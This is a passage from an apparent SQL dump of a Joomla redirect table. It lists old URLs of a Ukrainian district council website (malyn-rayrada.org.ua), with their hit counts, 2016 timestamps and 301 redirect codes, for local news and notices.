00:00:00',301),(25475,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=509:2011-12-20-08-03-11&lang=uk&option=com_content&view=article','','','',4,0,'2016-02-09 15:43:03','0000-00-00 00:00:00',301),(25476,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?id=1299:-lr-&catid=58:--30042014-&lang=uk','','','',12,0,'2016-02-09 16:11:40','0000-00-00 00:00:00',301),(25477,'http://www.malyn-rayrada.org.ua/index.php/1002-pro-sklikannya-37-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-02-09 21:01:48','0000-00-00 00:00:00',301),(25478,'http://www.malyn-rayrada.org.ua/index.php/1004-komunalne-pidpriemstvo-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-09 21:01:51','0000-00-00 00:00:00',301),(25479,'http://www.malyn-rayrada.org.ua/index.php/101-hristijanskij-svit-svjatkue-verbnu-nedilju-ta?tmpl=component&print=1&layout=default&page=','','','',10,0,'2016-02-09 21:01:59','0000-00-00 00:00:00',301),(25480,'http://www.malyn-rayrada.org.ua/index.php/1015-pro-perenesennya-dati-sklikannya-37-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-02-09 21:02:06','0000-00-00 00:00:00',301),(25481,'http://www.malyn-rayrada.org.ua/index.php/1041-informue-nachalnik-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-malegus-a-s?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-02-09 21:03:33','0000-00-00 00:00:00',301),(25482,'http://www.malyn-rayrada.org.ua/index.php/1044-shchodo-okremikh-aspektiv-pensijnogo-zabezpechennya?tmpl=component&print=1&layout=default&page=','','','',10,0,'2016-02-09 21:03:49','0000-00-00 00:00:00',301),(25483,'http://www.malyn-rayrada.org.ua/index.php/1054-z-24-lyutogo-po-24-bereznya-v-ukrajini-provodivsya-misyachnik-borotbi-z-tuberkulozom?tmpl=component&print=1&layout=default&page=','','','',9,0,'2016-02-09 21:04:16','0000-00-00 00:00:00',301),(25484,'http://www.malyn-rayrada.org.ua/index.php/1059-zarplata-v-konverti-zlidni-na-starist?tmpl=component&print=1&layout=default&page=','','','',10,0,'2016-02-09 21:04:50','0000-00-00 00:00:00',301),(25485,'http://www.malyn-rayrada.org.ua/index.php/1066-informue-nachalnik-upravlinnya-pf-ukrajini-v-malinskomu-rajoni-malegus-a-s?tmpl=component&print=1&layout=default&page=','','','',11,0,'2016-02-09 21:04:58','0000-00-00 00:00:00',301),(25486,'http://www.malyn-rayrada.org.ua/index.php/1075-shanovni-malinchani-ta-gosti-malinshchini','','','',30,0,'2016-02-09 21:05:05','0000-00-00 00:00:00',301),(25487,'http://www.malyn-rayrada.org.ua/index.php/1106-vidbuvsya-rajonnij-seminar-z-pitan-obgovorennya-ta-pidgotovki-proektiv-vidpovidnikh-rishen-shchodo-dobrovilnogo-ob-ednannya-teritorialnikh-gromad?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-02-09 21:05:30','0000-00-00 00:00:00',301),(25488,'http://www.malyn-rayrada.org.ua/index.php/1130-ogoloshennya-pro-namiri-shchodo-orendi-komunalnogo-majna','','','',31,0,'2016-02-09 21:05:58','0000-00-00 00:00:00',301),(25489,'http://www.malyn-rayrada.org.ua/index.php/1173-ogoloshennya-shchodo-orendi-majna?tmpl=component&print=1&layout=default&page=','','','',11,0,'2016-02-09 21:06:27','0000-00-00 00:00:00',301),(25490,'http://www.malyn-rayrada.org.ua/index.php/1213-upravlinnya-derzhgeokadastru-u-malinskomu-rajoni-informue?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-02-09 21:06:45','0000-00-00 00:00:00',301),(25491,'http://www.malyn-rayrada.org.ua/index.php/1215-shchodo-situatsiji-iz-skraplenim-gazom','','','',23,0,'2016-02-09 21:06:48','0000-00-00 00:00:00',301),(25492,'http://www.malyn-rayrada.org.ua/index.php/1216-proponuemo-v-orendu-majnu','','','',22,0,'2016-02-09 21:06:51','0000-00-00 00:00:00',301),(25493,'http://www.malyn-rayrada.org.ua/index.php/1221-vid-zavtra-zhitimemo-za-zimovim-chasom?tmpl=component&print=1&layout=default&page=','','','',14,0,'2016-02-09 21:06:57','0000-00-00 00:00:00',301),(25494,'http://www.malyn-rayrada.org.ua/index.php/1349-vitaemo-iz-svyatom-2','','','',18,0,'2016-02-09 21:09:40','0000-00-00 00:00:00',301),(25495,'http://www.malyn-rayrada.org.ua/index.php/1349-vitaemo-iz-svyatom-2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-09 21:09:46','0000-00-00 00:00:00',301),(25496,'http://www.malyn-rayrada.org.ua/index.php/185-vitaemo-z-dnem-peremogi','','','',19,0,'2016-02-09 21:10:17','0000-00-00 00:00:00',301),(25497,'http://www.malyn-rayrada.org.ua/index.php/791-sogodni-28-a-richnicja-avarii-na-chetvertomu','','','',21,0,'2016-02-09 21:11:24','0000-00-00 00:00:00',301),(25498,'http://www.malyn-rayrada.org.ua/index.php/889-novini-fiskalnoji-sluzhbi','','','',25,0,'2016-02-09 21:11:32','0000-00-00 00:00:00',301),(25499,'http://www.malyn-rayrada.org.ua/index.php/890-upravlinnya-pratsi-ta-sotsialnogo-zakhistu-naselennya-rajderzhadministratsiji-informue?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-09 21:11:49','0000-00-00 00:00:00',301),(25500,'http://www.malyn-rayrada.org.ua/index.php/946-z-dnem-mistsevogo-samovryaduvannya','','','',44,0,'2016-02-09 21:12:01','0000-00-00 00:00:00',301),(25501,'http://www.malyn-rayrada.org.ua/index.php/946-z-dnem-mistsevogo-samovryaduvannya?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-09 21:12:05','0000-00-00 00:00:00',301),(25502,'http://www.malyn-rayrada.org.ua/index.php/951-1?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-09 21:12:30','0000-00-00 00:00:00',301),(25503,'http://www.malyn-rayrada.org.ua/index.php/953-nareshti-fraza-dnya?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-09 21:13:08','0000-00-00 00:00:00',301),(25504,'http://www.malyn-rayrada.org.ua/index.php/955-turbota-pro-lyudej-odin-iz-prioritetiv-diyalnosti-organiv-pensijnogo-fondu','','','',10,0,'2016-02-09 21:13:21','0000-00-00 00:00:00',301),(25505,'http://www.malyn-rayrada.org.ua/index.php/955-turbota-pro-lyudej-odin-iz-prioritetiv-diyalnosti-organiv-pensijnogo-fondu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-09 21:13:33','0000-00-00 00:00:00',301),(25506,'http://www.malyn-rayrada.org.ua/index.php/956-pro-sklikannya-36-sesiji-rajonnoji-radi-6-sklikannya','','','',15,0,'2016-02-09 21:13:46','0000-00-00 00:00:00',301),(25507,'http://www.malyn-rayrada.org.ua/index.php/956-pro-sklikannya-36-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-09 21:13:50','0000-00-00 00:00:00',301),(25508,'http://www.malyn-rayrada.org.ua/index.php/971-shchodo-situatsiji-iz-postachannyam-elektroenergiji-spozhivacham-rajonu-ta-mista','','','',8,0,'2016-02-09 21:13:53','0000-00-00 00:00:00',301),(25509,'http://www.malyn-rayrada.org.ua/index.php/971-shchodo-situatsiji-iz-postachannyam-elektroenergiji-spozhivacham-rajonu-ta-mista?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-09 21:14:12','0000-00-00 00:00:00',301),(25510,'http://www.malyn-rayrada.org.ua/index.php/972-do-vidoma-zhiteliv-malinshchini-informue-derzhzemagenstvo?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-09 21:14:33','0000-00-00 00:00:00',301),(25511,'http://www.malyn-rayrada.org.ua/index.php/975-pro-priznachennya-v-litvinenka-golovoyu-malinskoji-rajonnoji-derzhavnoji-administratsiji-zhitomirskoji-oblasti?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-09 21:14:52','0000-00-00 00:00:00',301),(25512,'http://www.malyn-rayrada.org.ua/index.php/976-malinski-podatkivtsi-nadayut-roz-yasnennya','','','',12,0,'2016-02-09 21:14:55','0000-00-00 00:00:00',301),(25513,'http://www.malyn-rayrada.org.ua/index.php/976-malinski-podatkivtsi-nadayut-roz-yasnennya?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-09 21:14:57','0000-00-00 00:00:00',301),(25514,'http://www.malyn-rayrada.org.ua/index.php/977-vitaemo-z-novim-2015-rokom','','','',21,0,'2016-02-09 21:15:06','0000-00-00 00:00:00',301),(25515,'http://www.malyn-rayrada.org.ua/index.php/977-vitaemo-z-novim-2015-rokom?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-02-09 21:15:11','0000-00-00 00:00:00',301),(25516,'http://www.malyn-rayrada.org.ua/index.php/978-pro-sklikannya-drugogo-plenarnogo-zasidannya-36-sesiji-rajonnoji-radi-6-sklikannya','','','',13,0,'2016-02-09 21:15:13','0000-00-00 00:00:00',301),(25517,'http://www.malyn-rayrada.org.ua/index.php/978-pro-sklikannya-drugogo-plenarnogo-zasidannya-36-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-09 21:15:17','0000-00-00 00:00:00',301),(25518,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/890-2013-01-06-09-42-40?lang=ru&Itemid=0','','','',1,0,'2016-02-09 21:15:23','0000-00-00 00:00:00',301),(25519,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=611:2012-03-23-16-24-28&catid=11&Itemid=14&lang=uk','','','',3,0,'2016-02-09 22:04:58','0000-00-00 00:00:00',301),(25520,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=609:-q-q&lang=ru&option=com_content&view=article','','','',3,0,'2016-02-10 00:02:34','0000-00-00 00:00:00',301),(25521,'http://malyn-rayrada.org.ua/index.php/970-pro-cotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-sichen-listopad-2014-roku','','','',13,0,'2016-02-10 00:45:27','0000-00-00 00:00:00',301),(25522,'http://malyn-rayrada.org.ua/index.php/1238-pro-sklikannya-2-sesiji-rajonnoji-radi-7-sklikannya','','','',4,0,'2016-02-10 00:45:28','0000-00-00 00:00:00',301),(25523,'http://malyn-rayrada.org.ua/index.php/740-do-vidoma-zhiteliv-mista-ta-rajonu_2','','','',5,0,'2016-02-10 00:45:35','0000-00-00 00:00:00',301),(25524,'http://malyn-rayrada.org.ua/index.php/991-ogoloshuetsya-konkurs','','','',4,0,'2016-02-10 00:45:39','0000-00-00 00:00:00',301),(25525,'http://malyn-rayrada.org.ua/index.php/413-ukaz-prezidenta-ukraini-673-2012','','','',6,0,'2016-02-10 00:45:42','0000-00-00 00:00:00',301),(25526,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=323:--------2007--2011-&Itemid=66&lang=en&option=com_content&view=article','','','',24,0,'2016-02-10 01:12:58','0000-00-00 00:00:00',301),(25527,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1213:2014-02-14-13-53-12&Itemid=14&lang=ru&option=com_content&view=article','','','',4,0,'2016-02-10 01:20:20','0000-00-00 00:00:00',301),(25528,'http://malyn-rayrada.org.ua/index.php/791-sogodni-28-a-richnicja-avarii-na-chetvertomu','','','',6,0,'2016-02-10 01:40:20','0000-00-00 00:00:00',301),(25529,'http://malyn-rayrada.org.ua/index.php/1004-komunalne-pidpriemstvo-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu?tmpl=component&print=1&layout=default&page=','','','',11,0,'2016-02-10 02:40:47','0000-00-00 00:00:00',301),(25530,'http://malyn-rayrada.org.ua/index.php/1041-informue-nachalnik-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-malegus-a-s','','','',9,0,'2016-02-10 02:41:44','0000-00-00 00:00:00',301),(25531,'http://malyn-rayrada.org.ua/index.php/1044-shchodo-okremikh-aspektiv-pensijnogo-zabezpechennya','','','',10,0,'2016-02-10 02:41:46','0000-00-00 00:00:00',301),(25532,'http://malyn-rayrada.org.ua/index.php/1102-vitaemo-iz-svyatom-ostannogo-dzvonika','','','',10,0,'2016-02-10 02:41:55','0000-00-00 00:00:00',301),(25533,'http://malyn-rayrada.org.ua/index.php/1106-vidbuvsya-rajonnij-seminar-z-pitan-obgovorennya-ta-pidgotovki-proektiv-vidpovidnikh-rishen-shchodo-dobrovilnogo-ob-ednannya-teritorialnikh-gromad?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-02-10 02:42:02','0000-00-00 00:00:00',301),(25534,'http://malyn-rayrada.org.ua/index.php/1130-ogoloshennya-pro-namiri-shchodo-orendi-komunalnogo-majna?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:42:32','0000-00-00 00:00:00',301),(25535,'http://malyn-rayrada.org.ua/index.php/1173-ogoloshennya-shchodo-orendi-majna','','','',11,0,'2016-02-10 02:43:07','0000-00-00 00:00:00',301),(25536,'http://malyn-rayrada.org.ua/index.php/1173-ogoloshennya-shchodo-orendi-majna?tmpl=component&print=1&layout=default&page=','','','',10,0,'2016-02-10 02:43:09','0000-00-00 00:00:00',301),(25537,'http://malyn-rayrada.org.ua/index.php/1213-upravlinnya-derzhgeokadastru-u-malinskomu-rajoni-informue','','','',12,0,'2016-02-10 02:43:41','0000-00-00 00:00:00',301),(25538,'http://malyn-rayrada.org.ua/index.php/1213-upravlinnya-derzhgeokadastru-u-malinskomu-rajoni-informue?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-10 02:43:44','0000-00-00 00:00:00',301),(25539,'http://malyn-rayrada.org.ua/index.php/1215-shchodo-situatsiji-iz-skraplenim-gazom','','','',7,0,'2016-02-10 02:43:46','0000-00-00 00:00:00',301),(25540,'http://malyn-rayrada.org.ua/index.php/1215-shchodo-situatsiji-iz-skraplenim-gazom?tmpl=component&print=1&layout=default&page=','','','',11,0,'2016-02-10 02:43:48','0000-00-00 00:00:00',301),(25541,'http://malyn-rayrada.org.ua/index.php/1216-proponuemo-v-orendu-majnu','','','',5,0,'2016-02-10 02:43:50','0000-00-00 00:00:00',301),(25542,'http://malyn-rayrada.org.ua/index.php/1216-proponuemo-v-orendu-majnu?tmpl=component&print=1&layout=default&page=','','','',11,0,'2016-02-10 02:43:52','0000-00-00 00:00:00',301),(25543,'http://malyn-rayrada.org.ua/index.php/1221-vid-zavtra-zhitimemo-za-zimovim-chasom?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-10 02:43:59','0000-00-00 00:00:00',301),(25544,'http://malyn-rayrada.org.ua/index.php/1238-pro-sklikannya-2-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=','','','',14,0,'2016-02-10 02:44:12','0000-00-00 00:00:00',301),(25545,'http://malyn-rayrada.org.ua/index.php/1262-viddil-statistiki-informue','','','',7,0,'2016-02-10 02:44:14','0000-00-00 00:00:00',301),(25546,'http://malyn-rayrada.org.ua/index.php/1262-viddil-statistiki-informue?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-02-10 02:44:16','0000-00-00 00:00:00',301),(25547,'http://malyn-rayrada.org.ua/index.php/1349-vitaemo-iz-svyatom-2','','','',17,0,'2016-02-10 02:44:35','0000-00-00 00:00:00',301),(25548,'http://malyn-rayrada.org.ua/index.php/1349-vitaemo-iz-svyatom-2?tmpl=component&print=1&layout=default&page=','','','',12,0,'2016-02-10 02:44:37','0000-00-00 00:00:00',301),(25549,'http://malyn-rayrada.org.ua/index.php/18-do-vidoma-zhiteliv-malinshhini?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-10 02:44:49','0000-00-00 00:00:00',301),(25550,'http://malyn-rayrada.org.ua/index.php/185-vitaemo-z-dnem-peremogi','','','',9,0,'2016-02-10 02:44:55','0000-00-00 00:00:00',301),(25551,'http://malyn-rayrada.org.ua/index.php/19-pro-nadannja-groshovoi-dopomogi-z-nagodi-69-i','','','',6,0,'2016-02-10 02:44:58','0000-00-00 00:00:00',301),(25552,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?id=2010','','','',5,0,'2016-02-10 02:45:40','0000-00-00 00:00:00',301),(25553,'http://malyn-rayrada.org.ua/index.php/305-informacija-pro-robotu-komisii-z-pitan-prodazhu','','','',5,0,'2016-02-10 02:45:50','0000-00-00 00:00:00',301),(25554,'http://malyn-rayrada.org.ua/index.php/305-informacija-pro-robotu-komisii-z-pitan-prodazhu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:45:52','0000-00-00 00:00:00',301),(25555,'http://malyn-rayrada.org.ua/index.php/390-malinshhina-svjatkue-90-richchja-utvorennja-rajonu?tmpl=component&print=1&layout=default&page=','','','',12,0,'2016-02-10 02:45:54','0000-00-00 00:00:00',301),(25556,'http://malyn-rayrada.org.ua/index.php/404-24-listopada-o-16-00-vidbudetsja-zagalnonacionalna','','','',8,0,'2016-02-10 02:45:56','0000-00-00 00:00:00',301),(25557,'http://malyn-rayrada.org.ua/index.php/404-24-listopada-o-16-00-vidbudetsja-zagalnonacionalna?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:45:59','0000-00-00 00:00:00',301),(25558,'http://malyn-rayrada.org.ua/index.php/413-ukaz-prezidenta-ukraini-673-2012?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:46:11','0000-00-00 00:00:00',301),(25559,'http://malyn-rayrada.org.ua/index.php/455-199-rokiv-tomu-narodivsja-taras-shevchenko?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:46:14','0000-00-00 00:00:00',301),(25560,'http://malyn-rayrada.org.ua/index.php/462-za-materialami-zvernen-rajonnoi-radi','','','',5,0,'2016-02-10 02:46:16','0000-00-00 00:00:00',301),(25561,'http://malyn-rayrada.org.ua/index.php/462-za-materialami-zvernen-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:46:19','0000-00-00 00:00:00',301),(25562,'http://malyn-rayrada.org.ua/index.php/466-chi-vidkrie-dveri-1-veresnja-2013-roku-novo-vorob','','','',14,0,'2016-02-10 02:46:21','0000-00-00 00:00:00',301),(25563,'http://malyn-rayrada.org.ua/index.php/466-chi-vidkrie-dveri-1-veresnja-2013-roku-novo-vorob?tmpl=component&print=1&layout=default&page=','','','',14,0,'2016-02-10 02:46:23','0000-00-00 00:00:00',301),(25564,'http://malyn-rayrada.org.ua/index.php/513-za-materialami-zvernen-rajonnoi-radi_3','','','',16,0,'2016-02-10 02:46:26','0000-00-00 00:00:00',301),(25565,'http://malyn-rayrada.org.ua/index.php/513-za-materialami-zvernen-rajonnoi-radi_3?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-02-10 02:46:28','0000-00-00 00:00:00',301),(25566,'http://malyn-rayrada.org.ua/index.php/563-do-vidoma-zhiteliv-malinshhini_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-10 02:46:30','0000-00-00 00:00:00',301),(25567,'http://malyn-rayrada.org.ua/index.php/577-informacija-pro-rezultati-vidchuzhennja-majna','','','',8,0,'2016-02-10 02:46:43','0000-00-00 00:00:00',301),(25568,'http://malyn-rayrada.org.ua/index.php/577-informacija-pro-rezultati-vidchuzhennja-majna?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:46:45','0000-00-00 00:00:00',301),(25569,'http://malyn-rayrada.org.ua/index.php/657-80-a-richnicja-golodomoru-1932-33-rokiv','','','',5,0,'2016-02-10 02:46:50','0000-00-00 00:00:00',301),(25570,'http://malyn-rayrada.org.ua/index.php/657-80-a-richnicja-golodomoru-1932-33-rokiv?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:46:52','0000-00-00 00:00:00',301),(25571,'http://malyn-rayrada.org.ua/index.php/663-shhodo-vidilennja-avtomobiliv-ekstrenoi-medichnoi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-10 02:46:53','0000-00-00 00:00:00',301),(25572,'http://malyn-rayrada.org.ua/index.php/685-z-novim-rokom-ta-rizdvom-hristovim_2','','','',8,0,'2016-02-10 02:46:55','0000-00-00 00:00:00',301),(25573,'http://malyn-rayrada.org.ua/index.php/685-z-novim-rokom-ta-rizdvom-hristovim_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:46:58','0000-00-00 00:00:00',301),(25574,'http://malyn-rayrada.org.ua/index.php/687-hristos-rozhdaetsja-slavimo-jogo_2','','','',12,0,'2016-02-10 02:47:00','0000-00-00 00:00:00',301),(25575,'http://malyn-rayrada.org.ua/index.php/687-hristos-rozhdaetsja-slavimo-jogo_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:47:03','0000-00-00 00:00:00',301),(25576,'http://malyn-rayrada.org.ua/index.php/691-shhodo-situacii-z-medichnim-obslugovuvannjam?tmpl=component&print=1&layout=default&page=','','','',12,0,'2016-02-10 02:47:05','0000-00-00 00:00:00',301),(25577,'http://malyn-rayrada.org.ua/index.php/722-bez-komentariv?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-02-10 02:47:10','0000-00-00 00:00:00',301),(25578,'http://malyn-rayrada.org.ua/index.php/727-do-vidoma-pensioneriv-onovleno','','','',12,0,'2016-02-10 02:47:12','0000-00-00 00:00:00',301),(25579,'http://malyn-rayrada.org.ua/index.php/729-vitaemo-usih-zhinok-iz-svjatom-vesni?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-02-10 02:47:14','0000-00-00 00:00:00',301),(25580,'http://malyn-rayrada.org.ua/index.php/730-sogodni-ves-svit-vidznachae-200-richnij-juvilej?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:47:16','0000-00-00 00:00:00',301),(25581,'http://malyn-rayrada.org.ua/index.php/731-pro-ekonomiju-derzhavnih-koshtiv-ta-nedopushhennja','','','',5,0,'2016-02-10 02:47:18','0000-00-00 00:00:00',301),(25582,'http://malyn-rayrada.org.ua/index.php/741-upravlinnja-pensijnogo-fondu-ukraini-v-malinskomu?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-10 02:47:23','0000-00-00 00:00:00',301),(25583,'http://malyn-rayrada.org.ua/index.php/743-do-vidoma-zhiteliv-mista-ta-rajonu_3','','','',5,0,'2016-02-10 02:47:25','0000-00-00 00:00:00',301),(25584,'http://malyn-rayrada.org.ua/index.php/743-do-vidoma-zhiteliv-mista-ta-rajonu_3?tmpl=component&print=1&layout=default&page=','','','',13,0,'2016-02-10 02:47:27','0000-00-00 00:00:00',301),(25585,'http://malyn-rayrada.org.ua/index.php/745-do-vidoma-pensioneriv_2','','','',5,0,'2016-02-10 02:47:29','0000-00-00 00:00:00',301),(25586,'http://malyn-rayrada.org.ua/index.php/745-do-vidoma-pensioneriv_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:47:31','0000-00-00 00:00:00',301),(25587,'http://malyn-rayrada.org.ua/index.php/753-do-vidoma-deputativ-rajonnoi-radi_3?tmpl=component&print=1&layout=default&page=','','','',13,0,'2016-02-10 02:47:35','0000-00-00 00:00:00',301),(25588,'http://malyn-rayrada.org.ua/index.php/782-dani-pro-vikonannja-dohidnoi-chastini-bjudzhetiv?tmpl=component&print=1&layout=default&page=','','','',13,0,'2016-02-10 02:47:39','0000-00-00 00:00:00',301),(25589,'http://malyn-rayrada.org.ua/index.php/790-do-vidoma-deputativ-rajonnoi-radi_4?tmpl=component&print=1&layout=default&page=','','','',13,0,'2016-02-10 02:47:42','0000-00-00 00:00:00',301),(25590,'http://malyn-rayrada.org.ua/index.php/798-ogoloshennja_16','','','',12,0,'2016-02-10 02:47:44','0000-00-00 00:00:00',301),(25591,'http://malyn-rayrada.org.ua/index.php/798-ogoloshennja_16?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:47:46','0000-00-00 00:00:00',301),(25592,'http://malyn-rayrada.org.ua/index.php/813-videozvit-iz-svjatkuvannja-dnja-ostannogo-dzvonika','','','',16,0,'2016-02-10 02:47:50','0000-00-00 00:00:00',301),(25593,'http://malyn-rayrada.org.ua/index.php/813-videozvit-iz-svjatkuvannja-dnja-ostannogo-dzvonika?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-10 02:47:52','0000-00-00 00:00:00',301),(25594,'http://malyn-rayrada.org.ua/index.php/814-pidtrimaemo-ukrainsku-armiju','','','',6,0,'2016-02-10 02:47:54','0000-00-00 00:00:00',301),(25595,'http://malyn-rayrada.org.ua/index.php/814-pidtrimaemo-ukrainsku-armiju?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:47:56','0000-00-00 00:00:00',301),(25596,'http://malyn-rayrada.org.ua/index.php/825-do-vidoma-deputativ-rajonnoi-radi_5','','','',5,0,'2016-02-10 02:47:58','0000-00-00 00:00:00',301),(25597,'http://malyn-rayrada.org.ua/index.php/825-do-vidoma-deputativ-rajonnoi-radi_5?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:48:01','0000-00-00 00:00:00',301),(25598,'http://malyn-rayrada.org.ua/index.php/826-pro-ogoloshennja-v-ukraini-dnja-zhalobi','','','',7,0,'2016-02-10 02:48:02','0000-00-00 00:00:00',301),(25599,'http://malyn-rayrada.org.ua/index.php/826-pro-ogoloshennja-v-ukraini-dnja-zhalobi?tmpl=component&print=1&layout=default&page=','','','',9,0,'2016-02-10 02:48:04','0000-00-00 00:00:00',301),(25600,'http://malyn-rayrada.org.ua/index.php/829-zaversheno-pidgotovku-do-provedennja-chergovoi_5?tmpl=component&print=1&layout=default&page=','','','',9,0,'2016-02-10 02:48:06','0000-00-00 00:00:00',301),(25601,'http://malyn-rayrada.org.ua/index.php/830-ogoloshennja-kubok-pirizhok','','','',15,0,'2016-02-10 02:48:08','0000-00-00 00:00:00',301),(25602,'http://malyn-rayrada.org.ua/index.php/830-ogoloshennja-kubok-pirizhok?tmpl=component&print=1&layout=default&page=','','','',13,0,'2016-02-10 02:48:11','0000-00-00 00:00:00',301),(25603,'http://malyn-rayrada.org.ua/index.php/839-do-vidoma-zhiteliv-malinshhini-3','','','',5,0,'2016-02-10 02:48:14','0000-00-00 00:00:00',301),(25604,'http://malyn-rayrada.org.ua/index.php/839-do-vidoma-zhiteliv-malinshhini-3?tmpl=component&print=1&layout=default&page=','','','',13,0,'2016-02-10 02:48:16','0000-00-00 00:00:00',301),(25605,'http://malyn-rayrada.org.ua/index.php/878-do-vidoma-zhiteliv-malinshchini','','','',11,0,'2016-02-10 02:48:18','0000-00-00 00:00:00',301),(25606,'http://malyn-rayrada.org.ua/index.php/886-pro-den-zakhisnika-ukrajini?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:48:20','0000-00-00 00:00:00',301),(25607,'http://malyn-rayrada.org.ua/index.php/896-povidomlennya-pro-rezultati-pozachergovikh-viboriv-barvinkivskogo-silskogo-golovi','','','',6,0,'2016-02-10 02:48:22','0000-00-00 00:00:00',301),(25608,'http://malyn-rayrada.org.ua/index.php/900-pro-timchasove-vikonannya-obov-yazkiv-golovi-malinskoji-rajonnoji-derzhavnoji-administratsiji-zhitomirskoji-oblasti?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-10 02:48:27','0000-00-00 00:00:00',301),(25609,'http://malyn-rayrada.org.ua/index.php/905-pristupili-do-vikonannya-obov-yazkiv-novoobrani-golovi-teritorialnikh-gromad','','','',11,0,'2016-02-10 02:48:39','0000-00-00 00:00:00',301),(25610,'http://malyn-rayrada.org.ua/index.php/906-pro-sklikannya-35-sesiji-rajonnoji-radi-6-sklikannya','','','',15,0,'2016-02-10 02:48:41','0000-00-00 00:00:00',301),(25611,'http://malyn-rayrada.org.ua/index.php/917-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-informue?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-02-10 02:48:46','0000-00-00 00:00:00',301),(25612,'http://malyn-rayrada.org.ua/index.php/920-oberezhno-chuma-svinej-uzhe-v-ivankivskomu-rajoni?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:48:48','0000-00-00 00:00:00',301),(25613,'http://malyn-rayrada.org.ua/index.php/921-shanovni-malinchani-potribna-vasha-dopomoga?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-02-10 02:48:50','0000-00-00 00:00:00',301),(25614,'http://malyn-rayrada.org.ua/index.php/932-ogoloshennya-shchodo-komunalnogo-majna-orenda?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-10 02:49:02','0000-00-00 00:00:00',301),(25615,'http://malyn-rayrada.org.ua/index.php/941-upravlinnya-pratsi-informue','','','',6,0,'2016-02-10 02:49:10','0000-00-00 00:00:00',301),(25616,'http://malyn-rayrada.org.ua/index.php/941-upravlinnya-pratsi-informue?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-10 02:49:11','0000-00-00 00:00:00',301),(25617,'http://malyn-rayrada.org.ua/index.php/946-z-dnem-mistsevogo-samovryaduvannya?tmpl=component&print=1&layout=default&page=','','','',9,0,'2016-02-10 02:49:16','0000-00-00 00:00:00',301),(25618,'http://malyn-rayrada.org.ua/index.php/951-1','','','',11,0,'2016-02-10 02:49:29','0000-00-00 